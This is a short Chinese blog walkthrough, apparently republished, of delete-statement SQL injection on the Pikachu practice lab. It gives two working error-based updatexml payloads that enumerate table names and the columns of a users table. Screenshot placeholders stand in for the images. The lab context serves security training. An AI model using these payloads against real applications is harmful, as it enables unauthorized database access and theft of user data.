pikachu 漏洞平台sql注入 之 delete注入

Posted 安全界 的彭于晏

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了pikachu 漏洞平台sql注入 之 delete注入相关的知识,希望对你有一定的参考价值。

delete 注入 一般在删除的界面 可能存在
我们看到靶场有一个留言板 点击删除抓个包试试

在这里插入图片描述
参数后面解payload 试一试

在这里插入图片描述
接着在后面爆表名字
or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1)
在这里插入图片描述
or updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’),1,31),0x7e),1)

爆出列的信息
在这里插入图片描述
接着爆出敏感字段
在这里插入图片描述
剩下的自己爆吧

以上是关于pikachu 漏洞平台sql注入 之 delete注入的主要内容,如果未能解决你的问题,请参考以下文章

pikachu 漏洞平台sql注入 之 搜索型注入

pikachu漏洞平台sql注入 之 数字型注入

pikachu 漏洞平台sql注入 之 字符型注入

Pikachu漏洞练习平台实验——SQL注入

web安全pikachu靶场之SQL注入

pikachu-SQL注入